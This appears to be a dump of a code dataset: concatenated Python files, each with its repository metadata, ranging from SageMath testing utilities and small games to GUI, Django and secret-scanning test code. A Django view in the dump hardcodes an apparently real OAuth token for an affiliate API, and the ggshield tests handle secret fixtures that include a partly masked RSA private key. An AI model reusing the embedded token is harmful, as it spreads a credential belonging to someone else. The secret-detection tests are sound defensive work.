....: assert(n == 49681376900427)\n sage: foo = random_testing(foo)\n sage: foo(seed=0, verbose=True)\n Random value: 49681376900427\n sage: foo(seed=15, verbose=True)\n Random value: 1049538412064764\n Random testing has revealed a problem in foo\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 15\n AssertionError()\n sage: foo() # random\n Random testing has revealed a problem in foo\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 272500700755151445506092479579811710040\n AssertionError()\n sage: foo.__doc__\n 'oh look, a docstring'\n sage: foo.__name__\n 'foo'\n sage: def bar(): pass\n sage: bar = random_testing(bar)\n sage: bar(print_seed=True) # random\n Random seed: 262841091890156346923539765543814146051\n \"\"\"\n from sage.misc.randstate import seed, initial_seed\n from sys import stdout\n\n @wraps(fn)\n def wrapped_fun(*args, **kwargs):\n arg_seed = None\n if 'seed' in kwargs:\n arg_seed = kwargs['seed']\n del kwargs['seed']\n with seed(arg_seed):\n used_seed = initial_seed()\n if 'print_seed' in kwargs:\n if kwargs['print_seed']:\n print(\"Random seed: {}\".format(used_seed))\n del kwargs['print_seed']\n # I don't know if this line is necessary, but it can't\n # hurt; and it would be a real pity to lose the\n # information you need to reproduce a segfault because\n # it was missing...\n stdout.flush()\n try:\n fn(*args, **kwargs)\n except Exception as e:\n # We treat any sort of Exception as a doctest\n # failure. 
(We have to eat the exception, because if\n # doctesting sees an exception, it doesn't display\n # whatever was printed before the exception happened\n # -- so the text we print here would be lost.) Note\n # that KeyboardInterrupt is not an Exception, so\n # pressing Control-C doesn't print this message.\n print(\"Random testing has revealed a problem in \" + fn.__name__)\n print(\"Please report this bug! You may be the first\")\n print(\"person in the world to have seen this problem.\")\n print(\"Please include this random seed in your bug report:\")\n print(\"Random seed: {}\".format(used_seed))\n print(repr(e))\n return wrapped_fun\n\n\n@random_testing\ndef test_add_commutes(trials, verbose=False):\n r\"\"\"\n This is a simple demonstration of the :func:`random_testing` decorator and\n its recommended usage.\n\n We test that addition is commutative over rationals.\n\n EXAMPLES::\n\n sage: from sage.misc.random_testing import test_add_commutes\n sage: test_add_commutes(2, verbose=True, seed=0)\n a == -4, b == 0 ...\n Passes!\n a == -1/2, b == -1/95 ...\n Passes!\n sage: test_add_commutes(10)\n sage: test_add_commutes(1000) # long time\n \"\"\"\n from sage.rings.rational_field import QQ\n for _ in range(trials):\n a = QQ.random_element()\n b = QQ.random_element()\n if verbose:\n print(\"a == {}, b == {} ...\".format(a, b))\n assert(a + b == b + a)\n if verbose:\n print(\"Passes!\")\n\n\n@random_testing\ndef test_add_is_mul(trials, verbose=False):\n r\"\"\"\n This example demonstrates a failing :func:`random_testing` test,\n and shows how to reproduce the error.\n\n DO NOT USE THIS AS AN EXAMPLE OF HOW TO USE\n :func:`random_testing`! Instead, look at\n :func:`sage.misc.random_testing.test_add_commutes`.\n\n We test that ``a+b == a*b``, for *a*, *b* rational. This is of\n course false, so the test will almost always fail.\n\n EXAMPLES::\n\n sage: from sage.misc.random_testing import test_add_is_mul\n\n We start by testing that we get reproducible results when setting\n *seed* to 0.\n\n ::\n\n sage: test_add_is_mul(2, verbose=True, seed=0)\n a == -4, b == 0 ...\n Random testing has revealed a problem in test_add_is_mul\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 0\n AssertionError()\n\n Normally in a ``@random_testing`` doctest, we would leave off the\n ``verbose=True`` and the ``# random``. We put it in here so that we can\n verify that we are seeing the exact same error when we reproduce\n the error below.\n\n ::\n\n sage: test_add_is_mul(10, verbose=True) # random\n a == -2/7, b == 1 ...\n Random testing has revealed a problem in test_add_is_mul\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 216390410596009428782506007128692114173\n AssertionError()\n\n OK, now assume that some user has reported a\n :func:`test_add_is_mul` failure. We can specify the same\n *random_seed* that was found in the bug report, and we will get the\n exact same failure so that we can debug the \"problem\".\n\n ::\n\n sage: test_add_is_mul(10, verbose=True, seed=216390410596009428782506007128692114173)\n a == -2/7, b == 1 ...\n Random testing has revealed a problem in test_add_is_mul\n Please report this bug! 
You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 216390410596009428782506007128692114173\n AssertionError()\n \"\"\"\n from sage.rings.rational_field import QQ\n for _ in range(trials):\n a = QQ.random_element()\n b = QQ.random_element()\n if verbose:\n print(\"a == {}, b == {} ...\".format(a, b))\n assert(a + b == a * b)\n if verbose:\n print(\"Passes!\")\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/misc/random_testing.py","file_name":"random_testing.py","file_ext":"py","file_size_in_byte":10186,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"29688089019","text":"MAX_GRID = 3\n\n\ndef create_grid(user_input: str) -> list[list[str]]:\n \"\"\"\n Create 3x3 Game Grid\n @param user_input: string containing X's / O's and/or empty lines\n @return: 3X3 Game Grid\n \"\"\"\n grid = []\n\n for i in range(0, len(user_input), MAX_GRID):\n row = [user_input[j] for j in range(i, MAX_GRID + i)]\n grid.append(row)\n\n return grid\n\n\ndef is_row_winner(grid: list[list[str]], player: str) -> bool:\n \"\"\"\n Check if X or O has won in any of the rows\n @param grid: 2d 3x3 list\n @param player: X or O\n @return: true if player has won else false\n \"\"\"\n for row in grid:\n if row.count(player) == MAX_GRID:\n return True\n\n return False\n\n\ndef is_col_winner(grid: list[list[str]], player: str) -> bool:\n \"\"\"\n Check if X or O has won in any of the columns\n @param grid: 2d 3x3 list\n @param player: X or O\n @return: true if player has won else false\n \"\"\"\n for i in range(len(grid)):\n count = 0\n for j in range(len(grid[i])):\n if grid[j][i] == player:\n count += 1\n if count == MAX_GRID:\n return True\n\n return False\n\n\ndef is_diag_winner(grid: list[list[str]], player: str) -> bool:\n \"\"\"\n Check if X or O has won in any of the diagonals\n @param grid: 2d 3x3 list\n @param player: X or O\n @return: true if player won diag else false\n \"\"\"\n count = 0\n # check diag\n for i in range(MAX_GRID):\n if grid[i][i] == player:\n count += 1\n\n if count == 3:\n return True\n\n # check reverse diag\n count = 0\n for i in range(MAX_GRID):\n if grid[i][MAX_GRID - 1 - i] == player:\n count += 1\n\n return count == 3\n\n\ndef is_cell_empty(grid: list[list[str]]) -> bool:\n \"\"\"\n Check if cell is empty\n @param grid: 2d 3x3 list\n @return: true if cell is empty else false\n \"\"\"\n for row in grid:\n for col in row:\n if col == \"_\":\n return True\n\n return False\n\n\ndef get_player_diff(grid: list[list[str]]) -> int:\n \"\"\"\n Get difference between X or O / O or X\n @param grid: 2d 3x3 list\n @return: difference\n \"\"\"\n player_x = 0\n player_o = 0\n\n for row in grid:\n for col in row:\n if col == \"X\":\n player_x += 1\n elif col == \"O\":\n player_o += 1\n\n return player_x - player_o if player_x > player_o else player_o - player_x\n\n\ndef is_game_finished(grid: list[list[str]]) -> bool:\n \"\"\"\n Check if game has finished\n @param grid: 2d 3x3 list\n @return: true if any of the players has won or it's a draw else false\n \"\"\"\n has_ended = True\n if (\n is_row_winner(grid, \"X\")\n or is_col_winner(grid, \"X\")\n or is_diag_winner(grid, \"X\")\n ):\n print(\"X wins\")\n return has_ended\n elif (\n is_row_winner(grid, \"O\")\n or is_col_winner(grid, \"O\")\n or is_diag_winner(grid, \"O\")\n ):\n print(\"O wins\")\n return has_ended\n # if no winner and cell is not empty it's a draw\n elif not 
is_cell_empty(grid):\n print(\"Draw\")\n return has_ended\n\n return False\n\n\ndef print_grid(grid: list[list[str]]) -> None:\n \"\"\"\n Print Game state / grid\n @param grid: 3x3 grid\n \"\"\"\n print(\"-\" * len(grid) * MAX_GRID)\n for row in grid:\n print(\"|\", end=\" \")\n for col in row:\n print(f\"{col}\", end=\" \")\n print(\"|\", end=\" \")\n print()\n print(\"-\" * len(grid) * MAX_GRID)\n","repo_name":"ovisb/python-simple-tic-tac-toe","sub_path":"simple_tic_tac_toe/simple_tic_tac_toe.py","file_name":"simple_tic_tac_toe.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20995913605","text":"# Import the random, string and natural language toolkit modules.\nimport random\nimport string\nfrom nltk.corpus import words\n\n\n# Create a function to play hangman\ndef play_hangman():\n\n # Randomly pick a secret word that has 4 or more letters.\n word_list = words.words()\n secret_word = \"\"\n while len(secret_word) < 4:\n secret_word = random.choice(word_list)\n # Put a '_' in the display word for every letter that needs to be guessed.\n display_word = [\"_\"] * len(secret_word)\n guessed_letters = []\n tries_left = 8\n\n while tries_left > 0 and \"_\" in display_word:\n # Show the player which letters have (and haven't) been guessed, and the number of tries that are left.\n print(\"\\n\" + \"\".join(display_word))\n if tries_left == 1:\n print(\"\\nYou have 1 try left\")\n else:\n print(\"\\nYou have\", tries_left, \"tries left\")\n letter_guess = input(\"Guess a letter: \")\n # If the guess is invalid, restart the loop.\n if len(letter_guess) != 1:\n print(\"Please guess a single letter.\")\n continue\n if letter_guess not in string.ascii_letters:\n print(\"That is not a letter.\")\n continue\n if letter_guess in guessed_letters:\n print(\"You already guessed that letter.\")\n continue\n # Add all valid guesses to a list of letters guessed.\n else:\n guessed_letters.append(letter_guess)\n # Update the display word if the player guesses a letter correctly.\n if letter_guess in secret_word:\n for x, letter in enumerate(secret_word):\n if letter_guess == letter:\n display_word[x] = letter_guess.upper()\n # If the letter isn't in the secret word, tell the player and subtract 1 from their remaining guesses.\n else:\n print(\"That letter is not in the word.\")\n tries_left -= 1\n\n # If the player guesses all the letters in the secret word before running out of guesses, they win!\n if \"_\" not in display_word:\n print(\"\\nYou guessed the word \\\"\" + secret_word.upper() + \"\\\"!\\nYou win!\")\n else:\n print(\"\\nYou didn't guess the word \\\"\" + secret_word.upper() + \"\\\"!\\nYou lose!\")\n\n\n# Display a welcome menu.\nwhile True:\n print('''\n H A N G M A N\n\n \"play\" : Play a game\n \"exit\" : Quit the program\n ''')\n choice = input(\"\\nWhat would you like to do? 
\")\n if choice == \"play\":\n print(\"\\nGood luck!\")\n play_hangman()\n continue\n elif choice == \"exit\":\n quit()\n else:\n print(\"Please choose from the options above.\")\n continue\n","repo_name":"valenciarichards/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43752509378","text":"from PySide6.QtWidgets import (QApplication, QCheckBox, QLabel, QLineEdit, QMainWindow)\nfrom PySide6 import QtCore, QtGui, QtWidgets\n\nfrom app.resource.windows.MyLogin import MyLogin\nfrom app.tools.CourseKiller import Coursekiller\nfrom app.resource.windows.MyMainUi import MyMainUi\n\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n self.course_killer = Coursekiller(\"app/config/config.yaml\")\n super().__init__(parent)\n self.init_login_ui()\n self.windowflags = self.windowFlags()\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n # self.main_ui = MyMainUi(self)\n # self.setCentralWidget(self.main_ui)\n self.setWindowTitle(\"Hdu Course Killer\")\n self.setWindowIcon(QtGui.QIcon(\":/icons/icons/app/logo.ico\"))\n self.show()\n\n\n\n \n def init_login_ui(self):\n self.login = MyLogin(self)\n self.login.set_forget_link(self.course_killer.config.config[\"session\"][\"url\"][\"login\"])\n self.login.connect_login_btn(self.course_killer.login)\n self.login.set_user_info(self.course_killer.config.config[\"userinfo\"][\"username\"],\\\n self.course_killer.config.config[\"userinfo\"][\"password\"], self.course_killer.config.config[\"userinfo\"][\"remember\"])\n self.login.login_success.connect(self.login_success)\n\n def init_main_ui(self):\n self.main_ui = MyMainUi(self)\n self.setCentralWidget(self.main_ui)\n self.setWindowFlags(self.windowflags)\n self.main_ui.data_changed.emit(self.course_killer.courses[\"show_info\"])\n self.main_ui.set_delete_func(self.delete_item)\n self.main_ui.set_search_func(self.course_killer.search)\n self.main_ui.set_add_func(self.course_killer.add_course)\n self.main_ui.set_run_func(self.course_killer.run)\n self.main_ui.set_get_course_info_func(self.course_killer.get_course_info)\n self.main_ui.set_user_info(self.course_killer.config.config[\"userinfo\"][\"username\"])\n self.show()\n \n def delete_item(self, index):\n self.course_killer.delete_item(index)\n self.main_ui.data_changed.emit(self.course_killer.courses[\"show_info\"]) # 删除之后要立即更新显示的表格(发射data已改变的信号)\n\n @QtCore.Slot()\n def login_success(self):\n self.login.close()\n self.init_main_ui()\n \n\n\n\nif __name__ == '__main__':\n app = QApplication()\n mainwindow = MainWindow()\n app.exec()\n\n\n\n","repo_name":"LittleHeroZZZX/HduCourseKiller","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"23232140279","text":"from anagram_check import AnagramChecker\n\n\ndef main():\n print(\"\\nWelcome to Anagram Checker!\")\n while True:\n inp_str = input(\"\\nPlease enter a word in lowercase (just hit <Enter> to exit) : \")\n if len(inp_str) == 0:\n print(\"\\nThanks for playing. Goodbye.\\n\")\n break\n inp_str = inp_str.strip()\n if not(inp_str.isalpha() and inp_str.islower() and len(inp_str.split()) == 1):\n print(\"Sorry, unexpected entry. 
Try again.\")\n continue\n \n run = AnagramChecker()\n anagrams = run.get_anagrams(inp_str)\n print(f\"\\nYOUR WORD : '{inp_str}'\")\n print(\"A valid word indeed.\")\n if anagrams == []:\n nice_str = 'none'\n else:\n nice_str = ', '.join(anagrams)\n print(f\"Anagrams for this word : {nice_str}.\")\n\nmain()\n ","repo_name":"Prodevking1/odc","sub_path":"WEEK 5/Day_5/mini_proj2/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34516873045","text":"import time\n\nfrom plugincore.database.config.database_info import DataBaseInfo\nfrom plugincore.database.config.db_driver import DBDriver\nfrom plugincore.database.support.database_api.db_thread import DBThread\nfrom plugincore.unit_tests.plugin_database.test_commit_data import commit_sqls\nfrom plugincore.unit_tests.plugin_database.test_select_data import database_info_dict, select_sqls\n\n\ndef db_thread_select():\n start = time.perf_counter()\n tdb = DBThread(db_driver=DBDriver(database_info_dict))\n print(time.perf_counter() - start)\n start = time.perf_counter()\n for r in tdb.fetchmany(sql_statements=select_sqls):\n print(r)\n print(time.perf_counter() - start)\n\ndef db_thread_commit():\n start = time.perf_counter()\n tdb = DBThread(db_driver=DBDriver(DataBaseInfo(database_info_dict)))\n tdb.commit(commit_sqls)\n print(time.perf_counter() - start)\n\n\nif __name__ == '__main__':\n db_thread_select()\n # db_thread_commit()\n","repo_name":"thcpc/warden","sub_path":"plugincore/src/plugincore/unit_tests/plugin_database/db_thread_test.py","file_name":"db_thread_test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71069861561","text":"import copy\nimport random\nfrom typing import Iterable, List, Set\n\nimport pytest\nfrom pygitguardian.models import Match, PolicyBreak, ScanResult\nfrom snapshottest import Snapshot\n\nfrom ggshield.core.filter import (\n censor_content,\n censor_match,\n get_ignore_sha,\n remove_ignored_from_result,\n)\nfrom ggshield.core.types import IgnoredMatch\nfrom tests.unit.conftest import (\n _MULTI_SECRET_ONE_LINE_PATCH,\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY,\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY_SCAN_RESULT,\n _MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT,\n _MULTI_SECRET_TWO_LINES_PATCH,\n _MULTI_SECRET_TWO_LINES_PATCH_SCAN_RESULT,\n _MULTILINE_SECRET,\n _MULTIPLE_SECRETS_PATCH_CONTENT,\n _MULTIPLE_SECRETS_SCAN_RESULT,\n _ONE_LINE_AND_MULTILINE_PATCH_CONTENT,\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT,\n _SIMPLE_SECRET_MULTILINE_PATCH,\n _SIMPLE_SECRET_MULTILINE_PATCH_SCAN_RESULT,\n _SIMPLE_SECRET_PATCH,\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT,\n)\n\n\n_FILTERED_MULTILINE_SECRET = \"\"\"-----BEGIN RSA PRIVATE KEY-----\n+MIIBOgIBAAJBAIIRkYjxjE3KIZi******************************+******\n+****************************************************************\n+****************************************************************\n+***********+****************************************************\n+****************+***********************************************\n+**********************+*****************************************\n+****+******Xme/ovcDeM1+3W/UmSHYUW4b3WYq4\n+-----END RSA PRIVATE KEY-----\"\"\" # noqa\n\n\n@pytest.mark.parametrize(\n \"policy_breaks, duplicates, expected_shas\",\n [\n pytest.param(\n 
_SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_breaks,\n False,\n {\"2b5840babacb6f089ddcce1fe5a56b803f8b1f636c6f44cdbf14b0c77a194c93\"},\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_breaks,\n True,\n {\"2b5840babacb6f089ddcce1fe5a56b803f8b1f636c6f44cdbf14b0c77a194c93\"},\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-duplicated\",\n ),\n pytest.param(\n _MULTIPLE_SECRETS_SCAN_RESULT.policy_breaks,\n False,\n {\"41b8889e5e794b21cb1349d8eef1815960bf5257330fd40243a4895f26c2b5c8\"},\n id=\"_MULTIPLE_SECRETS_SCAN_RESULT\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT.policy_breaks,\n False,\n {\n \"530e5a4a7ea00814db8845dd0cae5efaa4b974a3ce1c76d0384ba715248a5dc1\",\n \"1945f4a0c42abb19c1a420ddd09b4b4681249a3057c427b95f794b18595e7ffa\",\n \"060bf63de122848f5efa122fe6cea504aae3b24cea393d887fdefa1529c6a02e\",\n },\n id=\"_MULTIPLE_SECRETS_SCAN_RESULT\",\n ),\n ],\n)\ndef test_get_ignore_sha(\n policy_breaks: List[PolicyBreak],\n duplicates: bool,\n expected_shas: Set[str],\n snapshot: Snapshot,\n) -> None:\n copy_policy_breaks = copy.deepcopy(policy_breaks)\n if duplicates:\n for policy_break in policy_breaks:\n random.shuffle(policy_break.matches)\n copy_policy_breaks.extend(policy_breaks)\n\n ignore_shas = {get_ignore_sha(policy_break) for policy_break in copy_policy_breaks}\n if duplicates:\n assert len(ignore_shas) == len(copy_policy_breaks) / 2\n assert ignore_shas == expected_shas\n\n\n@pytest.mark.parametrize(\n \"scan_result, ignores, final_len\",\n [\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n [],\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_break_count,\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-no remove, not all policies\",\n ),\n pytest.param(\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT,\n [],\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT.policy_break_count - 1,\n id=\"_SIMPLE_SECRET_PATCH_WITH_FILENAME_SCAN_RESULT-not all policies\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n [\"2b5840babacb6f089ddcce1fe5a56b803f8b1f636c6f44cdbf14b0c77a194c93\"],\n 0,\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-remove by sha\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n [\"368ac3edf9e850d1c0ff9d6c526496f8237ddf91\"],\n 0,\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-remove by plaintext\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT,\n [\"1945f4a0c42abb19c1a420ddd09b4b4681249a3057c427b95f794b18595e7ffa\"],\n 2,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT-remove one by sha\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT,\n [\n \"060bf63de122848f5efa122fe6cea504aae3b24cea393d887fdefa1529c6a02e\",\n \"ce3f9f0362bbe5ab01dfc8ee565e4371\",\n ],\n 1,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT-remove two by mix\",\n ),\n ],\n)\ndef test_remove_ignores(\n scan_result: ScanResult, ignores: Iterable, final_len: int\n) -> None:\n copy_result = copy.deepcopy(scan_result)\n ignored_matches = [IgnoredMatch(name=\"\", match=x) for x in ignores]\n remove_ignored_from_result(copy_result, ignored_matches)\n\n assert len(copy_result.policy_breaks) == final_len\n assert copy_result.policy_break_count == final_len\n\n\n@pytest.mark.parametrize(\n \"input_match, expected_value\",\n [\n pytest.param(\n Match.SCHEMA.load(\n {\n \"match\": \"294790898041575\",\n \"index_start\": 31,\n \"index_end\": 46,\n \"type\": \"client_id\",\n }\n ),\n \"294*********575\",\n id=\"SIMPLE\",\n ),\n pytest.param(\n Match.SCHEMA.load(\n {\n \"match\": _MULTILINE_SECRET,\n \"index_start\": 
31,\n \"index_end\": 46,\n \"type\": \"client_id\",\n }\n ),\n _FILTERED_MULTILINE_SECRET,\n id=\"_MULTILINE_SECRET\",\n ),\n ],\n)\ndef test_censor_match(input_match: Match, expected_value: str) -> None:\n value = censor_match(input_match)\n assert len(value) == len(input_match.match)\n assert value == expected_value\n\n\n@pytest.mark.parametrize(\n \"content, policy_breaks\",\n [\n pytest.param(\n _MULTIPLE_SECRETS_PATCH_CONTENT,\n _MULTIPLE_SECRETS_SCAN_RESULT.policy_breaks,\n id=\"_MULTIPLE_SECRETS\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_CONTENT,\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_ONE_LINE_AND_MULTILINE_PATCH_SCAN_CONTENT\",\n ),\n pytest.param(\n _MULTI_SECRET_ONE_LINE_PATCH,\n _MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH,\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_SIMPLE_SECRET_PATCH\",\n ),\n pytest.param(\n _SIMPLE_SECRET_MULTILINE_PATCH,\n _SIMPLE_SECRET_MULTILINE_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_SIMPLE_SECRET_MULTILINE_PATCH\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH,\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_SIMPLE_SECRET_WITH_FILENAME_PATCH\",\n ),\n pytest.param(\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY,\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY_SCAN_RESULT.policy_breaks,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH_OVERLAY\",\n ),\n pytest.param(\n _MULTI_SECRET_TWO_LINES_PATCH,\n _MULTI_SECRET_TWO_LINES_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_MULTI_SECRET_TWO_LINES_PATCH\",\n ),\n ],\n)\ndef test_censor_content(content: str, policy_breaks: List[PolicyBreak]) -> None:\n copy_policy_breaks = copy.deepcopy(policy_breaks)\n new_content = censor_content(content, copy_policy_breaks)\n assert len(new_content) == len(content)\n for policy_break in policy_breaks:\n for match in policy_break.matches:\n assert match.match not in new_content\n","repo_name":"GitGuardian/ggshield","sub_path":"tests/unit/core/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","stars":1431,"dataset":"github-code","pt":"40"} +{"seq_id":"38797973080","text":"from .views import FruitsView, ImagesView, IndexView\nfrom django.urls import path\n\nfrom rest_framework.routers import SimpleRouter\n\nrouter = SimpleRouter()\nrouter.register(\"fruits\", FruitsView)\nrouter.register(\"images\", ImagesView, base_name=\"ImagesView\")\n\nurlpatterns = [\n path('', IndexView.as_view(), name='indexview'),\n]\n\nurlpatterns += router.urls\n","repo_name":"BoazKG93/superprice","sub_path":"superprice_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36641271107","text":"import aspose.slides as slides\n\n#ExStart:InterlopShapeID\n# The path to the documents directory.\ndataDir = \"./examples/data/\"\noutDir = \"./examples/out/\"\n\n# Instantiate a Presentation class that represents the presentation file\nwith slides.Presentation(dataDir + \"welcome-to-powerpoint.pptx\") as presentation:\n # Getting unique shape identifier in slide scope\n 
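# Indexing [0][0] assumes the sample deck contains at least one slide with one shape\n    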
print(str(presentation.slides[0].shapes[0].office_interop_shape_id))\n\n#ExEnd:InterlopShapeID\n","repo_name":"aspose-slides/Aspose.Slides-for-Python-via-.NET","sub_path":"examples/src/Shapes/InterlopShapeID.py","file_name":"InterlopShapeID.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43203391525","text":"from django.shortcuts import render, HttpResponse\nimport requests, json, hashlib\nfrom six.moves.urllib.parse import urlparse, urlunparse, parse_qs\nimport urllib\nfrom xml.etree import ElementTree\nfrom .models import Product\n\ndef index(request):\n return render(request, 'base.html')\n\ndef encryptMd5Hash(string):\n m= hashlib.md5()\n m.update(string.encode('utf-8'))\n return m.hexdigest()\n\ndef rewardstyle(request):\n if request.method == 'POST':\n advertiserName = request.POST.get('advertiserName')\n getProdcuts(advertiserName)\n parsedData = []\n req = requests.get('https://api.rewardstyle.com/v1/advertisers?oauth_token=b0971cc14df1152194c7c9a4e72cf297')\n jsonList = []\n jsonList.append(json.loads(req.content.decode()))\n advertiserData = {}\n for data in jsonList:\n advertiserData['advertiser'] = data['advertisers']\n parsedData.append(advertiserData)\n return render(request, 'serviceapp/rewardstyle.html', {'data': parsedData}) \n \n\ndef getProdcuts(advertiserName):\n token = 'b0971cc14df1152194c7c9a4e72cf297'\n tokenHashed = encryptMd5Hash(token)\n url = 'https://api.rewardstyle.com/v1/product_feed?advertiser='+advertiserName+'&oauth_token='+token\n xml = requests.get(url, stream=True)\n tree = ElementTree.parse(xml.raw)\n for item in tree.iter('item'):\n product_id = item.find('product_id').text\n product_name = item.find('product_name').text\n product_url = item.find('product_url').text\n parsed = urlparse(product_url)\n qs = parse_qs(parsed.query)\n qs['t'] = [tokenHashed]\n newqs = urllib.parse.urlencode(qs, doseq=1)\n newurl = urlunparse([newqs if i == 4 else x for i,x in enumerate(parsed)])\n advertiser = item.find('advertiser').text\n designer = item.find('designer').text\n image_url = item.find('image_url').text\n price = item.find('price').text\n commission = item.find('commission').text\n product_to_save = Product.objects.create(product_id=product_id, product_name=product_name, product_url=newurl, advertiser=advertiser, designer=designer, image_url=image_url, price=price, commission=commission)\n product_to_save.save()\n return HttpResponse()\n\n\n\n\n\n","repo_name":"wuno/django-rest","sub_path":"serviceapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908319960","text":"\"\"\"Program to count the votes of political parties\r\nShane Robinson\r\n20 April\"\"\"\r\n\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\nprint(\"Enter the names of parties (terminated by DONE):\\n\")\r\nname = input()\r\nparties = []\r\n\r\nwhile name!='DONE':\r\n parties.append(name)\r\n name = input()\r\n\r\nparties.sort() #orders list\r\nprint(\"Vote counts:\")\r\n\r\nwhile parties!=[]:\r\n party = parties[0]\r\n num = parties.count(party) #count occurrences of first item in list\r\n for i in range(num):\r\n parties.remove(party) #remove all occurrences of first item\r\n print(party, \" \"*(9-len(party)), \"-\", 
num)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/rbnsha013/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37013031646","text":"def maxSubArray(nums):\n # e = nums\n # temp = 0\n # result = 0\n # p = len(e)\n # for i in range(0, p):\n # temp = 0\n # for j in range(0, p):\n # temp += e[j]\n # result += temp\n # return result\n if len(nums) == 1:\n return nums[0]\n\n sum_r = [0 for i in range(len(nums))]\n sum_r[0] = nums[0]\n\n for i in range(1,len(nums)):\n if sum_r[i-1] < 0:\n sum_r[i] = nums[i]\n else:\n sum_r[i] = sum_r[i-1] + nums[i]\n\n return max(sum_r)\n\n\n\nl = [4,-1,3,5,2]\n\nprint(maxSubArray(l))","repo_name":"akashnadimpally/DSALGO","sub_path":"ALGO/MaxValueSubArray.py","file_name":"MaxValueSubArray.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40173561217","text":"from graphviz import Digraph\nfrom IPython.display import display\n\noption = \"depth2normal\"\n\nif 0:\n g = Digraph('G', format='png')\n\n g.attr(rankdir='TB', size='16,16')\n\n g.attr('node', shape='box')\n g.node('A', '1. Initialize variables\\n\\n'\n '- vertexMapz, vertexMapx_, vertexMapy_\\n'\n '- utanMap_x, utanMap_y, utanMap_z\\n'\n '- 